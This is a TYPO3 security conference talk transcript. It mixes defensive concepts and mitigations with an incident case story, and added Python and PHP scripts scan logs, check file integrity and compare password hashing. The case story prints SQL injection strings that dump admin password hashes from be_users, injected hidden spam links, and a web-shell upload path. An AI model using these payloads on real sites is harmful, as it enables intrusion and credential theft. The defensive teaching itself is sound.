TYPO3 Conference - San Francisco 2011
TYPO Security - Risks and Mitigation
T3CON11 San Francisco
10.06.2011
Inspiring people to share



Helmut Hummel <helmut.hummel@typo3.org>
Introduction

About me
   Involved in TYPO3 project since 2005

   Member of the TYPO3 Security Team since 2008

   TYPO3 Security Team Leader since 2009

   TYPO3 Core Team Member since 2011

   Employed at naw.info in Hannover, Germany

   Twitter: helhum

   Blog: http://www.naw.info/blogs/typo3security/



TYPO Security - Risks and Mitigation


Agenda
   What is Security?

   General Security Concepts

   Attack Vectors

   Knowing the Enemy: A Case Story

   Mitigation

   TYPO3 Security Team




What is Security?




Is TYPO3 secure?
 Is my TYPO3 Site secure?




What is Security?


Criteria for Security
   Privacy

   Integrity and Property

   Availability and Intentional Use




Security is a process, not a product.
(Bruce Schneier)




What is Security?


Security is a process
   Care taking and improvements over time

   Depending on your needs

   Nothing is secure! Something can only be not insecure at a particular time




What is Security?

Why TYPO3 can be considered to be not insecure

   TYPO3 Security Team takes care

   Highly customizable for your needs

   Few critical Security issues over time




General Security Concepts




General Security Concepts


General Security Concepts
   Defense in depth

   Minimize Exposure / Least privilege



   Do not rely on security by obscurity

   Log Activities




Attack Vectors




Attack Vectors


Attack Vectors
   Security Issues in outdated TYPO3 Versions

   Security Issues in (outdated) TYPO3 Extensions

   Security Issues in TypoScript

   Simple passwords

   Compromised PC with FTP access

   Other Software on the webserver




Knowing the Enemy




Knowing the Enemy

The incident, how did it happen?

        <div style="display:none;"><a href="http://totiyaso.tripod.com/jovian-v251-for-palmos-
        crack.html">Jovian v2.5.1 for PalmOS Crack</a> <a href="http://tarajoz.tripod.com/clickomania-21-for-
        palmos-crack.html">Clickomania 2.1 for PalmOS Crack</a> <a href="http://mujaciya.tripod.com/
        ollydbg-110-xp-crack.html">OllyDbg 1.10 XP Crack</a> <a href="http://loyobusi.tripod.com/infograph-
        infocad-v651b-crack.html">InfoGraph InfoCAD v6.51b Crack</a> <a href="http://nisexufo.tripod.com/
        customizer-xp-v15-by-tnt-crack.html">Customizer XP v1.5 by TNT Crack</a> <a href="http://
        yajegoco.tripod.com/gw3dfeatures-for-solidworks-v5-crack.html">GW3Dfeatures For SolidWorks v5 Crack</
        a> <a href="http://lebuvoxo.tripod.com/regrun-ii-v291-crack.html">RegRun II v2.91 Crack</a> <a
        href="http://ziziquy.tripod.com/stuffit-standard-v852165-crack.html">StuffIt Standard v8.5.2.165
        Crack</a> <a href="http://ziziquy.tripod.com/glu3d-v1308-for-3dsmax-7-crack.html">Glu3D v1.3.08 for
        3dsmax 7 Crack</a> <a href="http://yucayibu.tripod.com/cpukiller-v20-serial-by-tnt-
        crack.html">CPUKILLER v2.0 Serial by TNT Crack</a> <a href="http://fimegipo.tripod.com/microangelo-
        v55-by-aaocg-crack.html">Microangelo v5.5 by AAOCG Crack</a> <a href="http://loyobusi.tripod.com/
        restoreit-deluxe-edition-v301-crack.html">RestoreIT! Deluxe Edition v3.01 Crack</a> <a href="http://
        tomuxeq.tripod.com/abbyy-scanto-office-v10-crack.html">ABBYY ScanTo Office v1.0 Crack</a> <a
        href="http://besiluho.tripod.com/anno-domini-2002-v106-build-1-crack.html">Anno Domini 2002 v1.06
        build 1 Crack</a> <a href="http://yepimal.tripod.com/serious-sam-2-plus-5-trainer-crack.html">SERIOUS
        SAM 2 PLUS 5 TRAINER Crack</a> <a href="http://vihuseya.tripod.com/pe-corrector-v166-by-fff-
        crack.html">PE Corrector v1.66 by FFF Crack</a> <a href="http://tarajoz.tripod.com/teenswebbrowser-
        bounce-10-crack.html">teensWebBrowser Bounce 1.0 Crack</a> <a href="http://loyobusi.tripod.com/bb-
        password-manager-v1011-crack.html">BB Password Manager v1.0.1.1 Crack</a> <a href="http://
        reyabade.tripod.com/calendar-wizard-v2014a-crack.html">Calendar Wizard v2.0.14a Crack</a> <a
        href="http://gezuvak.tripod.com/1-act-personal-firewall-2006-crack.html">1-ACT Personal Firewall 2006
        Crack</a> <a href="http://fimegipo.tripod.com/system-locker-112f-by-dbc-crack.html">System Locker
        1.12f by DBC Crack</a> <a href="http://sehuxogo.tripod.com/nidesoft-dvd-ripper-v3062-
        crack.html">Nidesoft DVD Ripper v3.0.62 Crack</a> <a href="http://ziziquy.tripod.com/clonecd-v4331-by-
        tsrh-crack.html">CloneCD v4.3.3.1 by TSRH Crack</a> <a href="http://tihuqap.tripod.com/icon-sucker-2-
        pro-210072-crack.html">Icon Sucker 2 Pro 2.10.072 Crack</a> <a href="http://coqoxole.tripod.com/
        primasoft-internet-optimizer-crack.html">PrimaSoft Internet Optimizer Crack</a> <a href="http://
        fimegipo.tripod.com/fairstars-recorder-v201-crack.html">FairStars Recorder v2.01 Crack</a> <a
        href="http://nekuqoj.tripod.com/email-validation-for-net-v20crack.html">Email Validation for NET
        v2.0Crack</a> <a href="http://xocedeqi.tripod.com/mathworks-matlab-r2006b-3-cds-crack.html">Mathworks
        Matlab R2006b (3 cds) Crack</a> <a




Knowing the Enemy


Searching for vulnerabilities

178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93' HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"




Knowing the Enemy


Searching for vulnerabilities
178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"




Knowing the Enemy


Searching for vulnerabilities


14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010




Knowing the Enemy


Searching for vulnerabilities


14:03:21: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010'




Knowing the Enemy


Searching for vulnerabilities


14:03:42: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010




Knowing the Enemy


Searching for vulnerabilities


14:04:15: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 --




Knowing the Enemy


Found something!


14:04:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 order by 10 --




Knowing the Enemy


Forging the exploit


14:08:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --




Knowing the Enemy


Exploit working!

14:09:04: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=-2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,username,password,admin)),20,21,22 from be_users where admin=1 --




Now the hacker has the md5 hashes of all admin passwords
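Seen from the defender's side, the same access log is the detection opportunity: the probe sequence above (a stray quote, then ORDER BY, then UNION SELECT from one client) is easy to pick out mechanically. The following Python script is an added example, not code from the talk or from TYPO3. It parses combined-format log lines, decodes the query parameters and flags the clients whose requests escalate from a lone quote to real SQL syntax. The sample lines are constructed after the ones on the slides (same client address, host and plugin parameter); the other fields and the second client are made up.

```python
"""Scan combined-format access log lines for the probing sequence shown in
the case story: a stray quote in a plugin parameter, then ORDER BY and
UNION SELECT attempts from the same client.

Added example, not code from the talk or from TYPO3. The sample lines are
constructed after the ones on the slides; the remaining fields are made up.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" prefix: client, identd, user, time, request, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators checked against *decoded* parameter values, weakest first.
PROBE_PATTERNS = [
    ("quote", re.compile(r"'")),
    ("comment", re.compile(r"(--|/\*|#)")),
    ("order_by", re.compile(r"\border\s+by\b", re.I)),
    ("union_select", re.compile(r"\bunion\s+select\b", re.I)),
]
# A lone quote is often a legitimate search term; these mean real SQL syntax.
ESCALATION = {"order_by", "union_select"}

# Constructed sample: two probes as on the slides, one normal request and one
# legitimate apostrophe in a search term (to show the false-positive case).
SAMPLE_LOG = r'''
178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93' HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
198.51.100.7 - - [17/Dec/2010:14:02:31 +0100] "GET /glossary/?tx_a21glossary%5Buid%5D=93 HTTP/1.1" 200 54383 "-" "Mozilla/5.0 (constructed)"
198.51.100.7 - - [17/Dec/2010:14:02:40 +0100] "GET /search/?sword=o%27neill HTTP/1.1" 200 1200 "-" "Mozilla/5.0 (constructed)"
'''.strip().splitlines()


def parse_line(line):
    """Split one log line into fields plus decoded (key, value) query params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # The request target may be an absolute URL (as on the slides) or a path.
    query = urlsplit(rec["target"]).query
    rec["params"] = parse_qsl(query, keep_blank_values=True)
    return rec


def indicators(value):
    """Names of the probe patterns that match a decoded parameter value."""
    return sorted(name for name, pat in PROBE_PATTERNS if pat.search(value))


def scan(lines):
    """Map client IP -> list of (time, parameter, indicators) for every hit."""
    findings = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for key, value in rec["params"]:
            hits = indicators(value)
            if hits:
                findings[rec["ip"]].append((rec["time"], key, hits))
    return dict(findings)


def attackers(findings):
    """Clients whose probes escalated from a quote to real SQL syntax."""
    return sorted(ip for ip, events in findings.items()
                  if any(set(hits) & ESCALATION for _, _, hits in events))


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, events in found.items():
        for time, key, hits in events:
            print(f"{ip} {time} {key}: {', '.join(hits)}")
    print("escalated:", attackers(found))
```

A lone quote is low confidence (the constructed o'neill search shows why), so alerting keys on the escalation set while the per-client timeline stays available for review; on a real server the lines come from scan(open(path)).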




Knowing the Enemy


15 minutes later: Log in as admin!

14:21:48: /typo3/index.php
14:21:50: /typo3/backend.php




Knowing the Enemy


Uploading web shell

14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/

14:22:46: /typo3conf/ext/realurlmanagement/title.php




You lose!
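The upload at 14:22:46 is exactly what a file integrity check catches: a new .php file appearing under typo3conf/ext/ outside a deployment. The following Python script is an added example, not part of the talk or of TYPO3. It takes a hash baseline of an extension directory, diffs a later snapshot against it and singles out executable files that were added or changed. The directory tree is constructed in a temporary folder; the extension and file names (realurlmanagement, title.php) are taken from the slide and nothing else about those files is assumed.

```python
"""Baseline-and-diff integrity check for a TYPO3 extension directory, the
kind of monitoring that flags a file dropped into typo3conf/ext/ outside a
deployment.

Added example, not code from the talk or from TYPO3. The tree built in demo()
is constructed; only the directory and file names mirror the slide.
"""
import hashlib
import tempfile
from pathlib import Path

# Anything the web server would execute if requested directly.
EXECUTABLE_SUFFIXES = {".php", ".phtml", ".php5", ".phar"}


def snapshot(root):
    """Map every file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            result[path.relative_to(root).as_posix()] = hashlib.sha256(
                path.read_bytes()).hexdigest()
    return result


def diff_snapshots(baseline, current):
    """Return (added, removed, modified) relative paths, each sorted."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current)
                      if baseline[p] != current[p])
    return added, removed, modified


def suspicious(added, modified):
    """Executable files that appeared or changed since the baseline."""
    return sorted(p for p in added + modified
                  if Path(p).suffix.lower() in EXECUTABLE_SUFFIXES)


def demo():
    """Build a constructed extension tree, baseline it, then simulate the upload."""
    with tempfile.TemporaryDirectory() as tmp:
        ext = Path(tmp) / "typo3conf" / "ext"
        (ext / "realurlmanagement").mkdir(parents=True)
        (ext / "realurlmanagement" / "ext_emconf.php").write_text("<?php // constructed\n")
        (ext / "realurlmanagement" / "ext_tables.sql").write_text("-- constructed\n")
        baseline = snapshot(ext)  # taken right after a clean deployment

        # Simulated incident: a new PHP file appears in the extension folder
        # (name as in the 14:22:46 request on the slide; content is a stand-in)
        # and an existing file is edited.
        (ext / "realurlmanagement" / "title.php").write_text("<?php // constructed stand-in\n")
        (ext / "realurlmanagement" / "ext_tables.sql").write_text("-- constructed, edited\n")

        added, removed, modified = diff_snapshots(baseline, snapshot(ext))
        return {"added": added, "removed": removed, "modified": modified,
                "suspicious": suspicious(added, modified)}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In practice the baseline is written once per deployment and kept off the web server, and the diff runs from cron; every entry in suspicious() is worth a look, and any hit under an extension that is not being updated is an incident, not noise.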


Knowing the Enemy


Conclusion
   Hackers know what they are doing

   They know TYPO3 very well

   They also use automated tools

   They often try to obfuscate the hack

   With automated attacks effort is low, gain is high




Mitigation




Mitigation


Mandatory steps
   Monitor and Back Up your Website

   Read the announce Mailing list and bulletins carefully

   Use up to date Software

   Use saltedpasswords and advise your admins (and users) to use non-obvious passwords

   Make your Integrators aware of possible TypoScript problems
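Why saltedpasswords is on the mandatory list: in the case story the UNION SELECT handed the attacker plain MD5 hashes, and one precomputed table of common passwords reverses those for every user at once. The following Python script is an added example, not TYPO3 or saltedpasswords code. It audits a constructed set of backend users twice, once stored as unsalted MD5 and once with a per-user random salt and an iterated hash, and counts the hash computations each audit costs. PBKDF2-HMAC-SHA256 from Python's hashlib is used here only as the illustration of a salted, iterated scheme; the saltedpasswords extension uses its own hash formats, so only the principle carries over.

```python
"""Unsalted MD5 versus salted, iterated hashing, measured as the work a
weak-password audit costs against a leaked be_users table.

Added example, not TYPO3 or saltedpasswords code. PBKDF2-HMAC-SHA256 stands
in for a salted scheme; users and the wordlist below are constructed.
"""
import hashlib
import hmac
import secrets

# Constructed wordlist: what anyone precomputes once and reuses forever.
COMMON_PASSWORDS = ["password", "123456", "admin", "typo3", "letmein"]

ITERATIONS = 50_000  # work factor; chosen for a quick demo, raise in real use


def hash_salted(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt, self-describing format."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"$pbkdf2-sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_salted(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    _, _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def audit_unsalted(stolen_hashes, words):
    """Unsalted MD5: one table of len(words) hashes serves every user at once.

    Returns ({hash: password}, number of hash computations)."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in words}
    weak = {h: table[h] for h in stolen_hashes if h in table}
    return weak, len(words)


def audit_salted(stored_hashes, words):
    """Salted and iterated: each (user, guess) pair costs ITERATIONS hashes.

    Returns ({stored: password}, number of hash computations)."""
    weak, work = {}, 0
    for stored in stored_hashes:
        for w in words:
            work += ITERATIONS
            if verify_salted(w, stored):
                weak[stored] = w
                break
    return weak, work


def demo():
    """Audit three constructed backend users under both storage schemes."""
    users = {"admin": "admin",
             "editor": "correct horse battery staple",
             "ops": "123456"}
    # What the UNION SELECT in the case story leaks under each scheme.
    md5_rows = {u: hashlib.md5(p.encode()).hexdigest() for u, p in users.items()}
    salted_rows = {u: hash_salted(p) for u, p in users.items()}

    weak_md5, work_md5 = audit_unsalted(list(md5_rows.values()), COMMON_PASSWORDS)
    weak_salt, work_salt = audit_salted(list(salted_rows.values()), COMMON_PASSWORDS)
    return {
        "md5_weak_users": sorted(u for u, h in md5_rows.items() if h in weak_md5),
        "salted_weak_users": sorted(u for u, h in salted_rows.items() if h in weak_salt),
        "md5_hash_ops": work_md5,
        "salted_hash_ops": work_salt,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Both audits find the same two obvious passwords, which is the second half of the slide: salting raises the cost per guess by the work factor and kills precomputation, but it does not rescue an admin whose password is in a five-word list. The salt makes the same password hash differently for every user, so a leaked table also no longer reveals who shares a password.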



Mitigation


Advanced steps
   Use TYPO3 Core features in favour of extensions

   Use protected backend access

   Consider using mod_security

   Consider using phpids TYPO3 Extension




TYPO3 Security Team




TYPO3 Security Team


Important things to know
   Responsible Disclosure Policy

   One communication channel (security@typo3.org)

   Pre-Announcements for critical issues only

   You can support us




TYPO Security - Risks and Mitigation


Resources
   PHP-Sicherheit (Christopher Kunz and Stefan Esser)

   Essential PHP Security (Chris Shiflett)

   http://www.owasp.org/

   http://typo3.org/teams/security/security-bulletins/

   http://typo3.org/teams/security/resources/

   http://buzz.typo3.org/teams/security/


Questions?




Thank You!




Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 

TYPO Security - Risks and Mitigation of a TYPO3 Site Security Breach

  • 1. TYPO3 Conference - San Francisco 2011 Inspiring TYPO Security - Risks and Mitigation sha
  • 2. T3CON11 San Francisco TYPO Security - Risks and Mitigation 10.06.2011 Helmut Hummel <helmut.hummel@typo3.org>
  • 3. Introduction / About me: Involved in TYPO3 project since 2005; Member of the TYPO3 Security Team since 2008; TYPO3 Security Team Leader since 2009; TYPO3 Core Team Member since 2011; Employed at naw.info in Hannover, Germany; Twitter: helhum; Blog: http://www.naw.info/blogs/typo3security/
  • 4. Agenda: What is Security?; General Security Concepts; Attack Vectors; Knowing the Enemy: A Case Story; Mitigation; TYPO3 Security Team
  • 5. What is Security?
  • 6. Is TYPO3 secure? Is my TYPO3 site secure?
  • 7-10. What is Security? / Criteria for Security: Privacy; Integrity and Property; Availability and Intentional Use
  • 11. "Security is a process, not a product." (Bruce Schneier)
  • 12-15. What is Security? / Security is a process: Caretaking and improvements over time; Depending on your needs; Nothing is secure! Something can only be not insecure at a particular time
  • 16-19. What is Security? / Why TYPO3 can be considered to be not insecure: TYPO3 Security Team takes care; Highly customizable for your needs; Few critical security issues over time
  • 20. General Security Concepts
  • 21-26. General Security Concepts: Defense in depth; Minimize exposure / Least privilege; Do not rely on security by obscurity; Log activities
  • 27. Attack Vectors
  • 28-34. Attack Vectors: Security issues in outdated TYPO3 versions; Security issues in (outdated) TYPO3 extensions; Security issues in TypoScript; Simple passwords; Compromised PC with FTP access; Other software on the web server
  • 35. Knowing the Enemy
  • 36. Knowing the Enemy / The incident, how did it happen? Hidden spam links had been injected into the site's HTML: <div style="display:none;"><a href="http://totiyaso.tripod.com/jovian-v251-for-palmos-crack.html">Jovian v2.5.1 for PalmOS Crack</a> <a href="http://tarajoz.tripod.com/clickomania-21-for-palmos-crack.html">Clickomania 2.1 for PalmOS Crack</a> <a href="http://mujaciya.tripod.com/ollydbg-110-xp-crack.html">OllyDbg 1.10 XP Crack</a> <a href="http://loyobusi.tripod.com/infograph-infocad-v651b-crack.html">InfoGraph InfoCAD v6.51b Crack</a> <a href="http://nisexufo.tripod.com/customizer-xp-v15-by-tnt-crack.html">Customizer XP v1.5 by TNT Crack</a> <a href="http://yajegoco.tripod.com/gw3dfeatures-for-solidworks-v5-crack.html">GW3Dfeatures For SolidWorks v5 Crack</a> <a href="http://lebuvoxo.tripod.com/regrun-ii-v291-crack.html">RegRun II v2.91 Crack</a> <a href="http://ziziquy.tripod.com/stuffit-standard-v852165-crack.html">StuffIt Standard v8.5.2.165 Crack</a> <a href="http://ziziquy.tripod.com/glu3d-v1308-for-3dsmax-7-crack.html">Glu3D v1.3.08 for 3dsmax 7 Crack</a> <a href="http://yucayibu.tripod.com/cpukiller-v20-serial-by-tnt-crack.html">CPUKILLER v2.0 Serial by TNT Crack</a> <a href="http://fimegipo.tripod.com/microangelo-v55-by-aaocg-crack.html">Microangelo v5.5 by AAOCG Crack</a> <a href="http://loyobusi.tripod.com/restoreit-deluxe-edition-v301-crack.html">RestoreIT! Deluxe Edition v3.01 Crack</a> <a href="http://tomuxeq.tripod.com/abbyy-scanto-office-v10-crack.html">ABBYY ScanTo Office v1.0 Crack</a> <a href="http://besiluho.tripod.com/anno-domini-2002-v106-build-1-crack.html">Anno Domini 2002 v1.06 build 1 Crack</a> <a href="http://yepimal.tripod.com/serious-sam-2-plus-5-trainer-crack.html">SERIOUS SAM 2 PLUS 5 TRAINER Crack</a> <a href="http://vihuseya.tripod.com/pe-corrector-v166-by-fff-crack.html">PE Corrector v1.66 by FFF Crack</a> <a href="http://tarajoz.tripod.com/teenswebbrowser-bounce-10-crack.html">teensWebBrowser Bounce 1.0 Crack</a> <a href="http://loyobusi.tripod.com/bb-password-manager-v1011-crack.html">BB Password Manager v1.0.1.1 Crack</a> <a href="http://reyabade.tripod.com/calendar-wizard-v2014a-crack.html">Calendar Wizard v2.0.14a Crack</a> <a href="http://gezuvak.tripod.com/1-act-personal-firewall-2006-crack.html">1-ACT Personal Firewall 2006 Crack</a> <a href="http://fimegipo.tripod.com/system-locker-112f-by-dbc-crack.html">System Locker 1.12f by DBC Crack</a> <a href="http://sehuxogo.tripod.com/nidesoft-dvd-ripper-v3062-crack.html">Nidesoft DVD Ripper v3.0.62 Crack</a> <a href="http://ziziquy.tripod.com/clonecd-v4331-by-tsrh-crack.html">CloneCD v4.3.3.1 by TSRH Crack</a> <a href="http://tihuqap.tripod.com/icon-sucker-2-pro-210072-crack.html">Icon Sucker 2 Pro 2.10.072 Crack</a> <a href="http://coqoxole.tripod.com/primasoft-internet-optimizer-crack.html">PrimaSoft Internet Optimizer Crack</a> <a href="http://fimegipo.tripod.com/fairstars-recorder-v201-crack.html">FairStars Recorder v2.01 Crack</a> <a href="http://nekuqoj.tripod.com/email-validation-for-net-v20crack.html">Email Validation for NET v2.0Crack</a> <a href="http://xocedeqi.tripod.com/mathworks-matlab-r2006b-3-cds-crack.html">Mathworks Matlab R2006b (3 cds) Crack</a> <a
  • 37. Knowing the Enemy / Searching for vulnerabilities: 178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93' HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63"
  • 38. Knowing the Enemy / Searching for vulnerabilities: 178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" (both probes get the identical 200 response of 54383 bytes: the page does not change, so the attacker moves on to the next plugin)
  • 39. Knowing the Enemy / Searching for vulnerabilities: 14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010
  • 40. Knowing the Enemy / Searching for vulnerabilities: 14:03:21: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010'
  • 41. Knowing the Enemy / Searching for vulnerabilities: 14:03:42: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010
  • 42. Knowing the Enemy / Searching for vulnerabilities: 14:04:15: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 --
  • 43. Knowing the Enemy / Found something! 14:04:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 order by 10 --
  • 44. Knowing the Enemy / Forging the exploit: 14:08:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 --
  • 45. Knowing the Enemy / Exploit working! 14:09:04: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=-2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,username,password,admin)),20,21,22 from be_users where admin=1 -- Now the hacker has the MD5 hashes of all admin passwords (TYPO3 stores plain MD5 in be_users.password unless the saltedpasswords extension is active)
  • 46. Knowing the Enemy / 15 minutes later: Log in as admin! 14:21:48: /typo3/index.php 14:21:50: /typo3/backend.php
  • 47. Knowing the Enemy / Uploading web shell (via t3quixplorer, a backend file-manager extension): 14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/typo3conf/ext/realurlmanagement/ 14:22:46: /typo3conf/ext/realurlmanagement/title.php You lose!
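The chain on the slides above (quote probe, ORDER BY, UNION SELECT against be_users, backend login, upload below typo3conf/ext/) is all in the web server's access log, so it can be picked out after the fact if the log survives. The PHP script below is an added example for this write-up, not a tool from the talk or from TYPO3: it parses combined-format log lines, URL-decodes the query string, tags each request and correlates the tags per client IP. The log lines embedded in it are constructed to mirror the slide excerpts (masked IP 178.122.0.0, the tx_galleryexample_pi2 parameters, the t3quixplorer upload) plus two other clients; the regular expressions, tag names and the one-hour correlation window are choices made for this example, not anything TYPO3 provides.

```php
<?php
// Added example; not from the talk and not part of TYPO3. Tags access-log
// requests and correlates them per IP to spot probe -> injection ->
// backend login -> upload. SAMPLE_LOG is constructed, not the original log.
declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
178.122.0.0 - - [17/Dec/2010:14:03:09 +0100] "GET /gallery/?tx_galleryexample_pi2%5Buid%5D=1192&tx_galleryexample_pi2%5Byear%5D=2010 HTTP/1.1" 200 31220 "-" "Opera/9.80 (Windows NT 5.1; U; ru)"
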